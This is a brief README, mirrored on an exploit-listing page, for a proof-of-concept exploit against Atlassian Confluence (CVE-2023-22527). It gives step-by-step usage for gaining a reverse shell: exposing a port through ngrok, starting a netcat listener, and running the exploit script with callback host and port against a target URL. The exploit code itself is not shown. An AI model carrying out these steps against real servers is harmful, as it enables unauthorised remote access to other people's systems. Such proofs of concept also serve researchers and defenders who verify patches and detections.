Share
## https://sploitus.com/exploit?id=D8032F79-E4CB-53C5-9DA1-1CFE19550DCC
# CVE-2023-22527-confluence
[Confluence] CVE-2023-22527 realworld poc

# Usage
## Download bun
https://github.com/oven-sh/bun/releases

## Start ngrok
```
ngrok tcp 4444
```

## Listen localhost 4444
```
nc -nvlp 4444
```

## Run exploit
```
bun exploit-CVE-2023-22527.js --lhost 0.tcp.ap.ngrok.io --lport 12169 --target https://xxx/
```

## Result
![image](https://github.com/VNCERT-CC/CVE-2023-22527-confluence/assets/8877695/716a9df2-3154-4672-9410-86ba87971798)
![image](https://github.com/VNCERT-CC/CVE-2023-22527-confluence/assets/8877695/1a2d7711-24dc-4837-8e49-21687ea4f6be)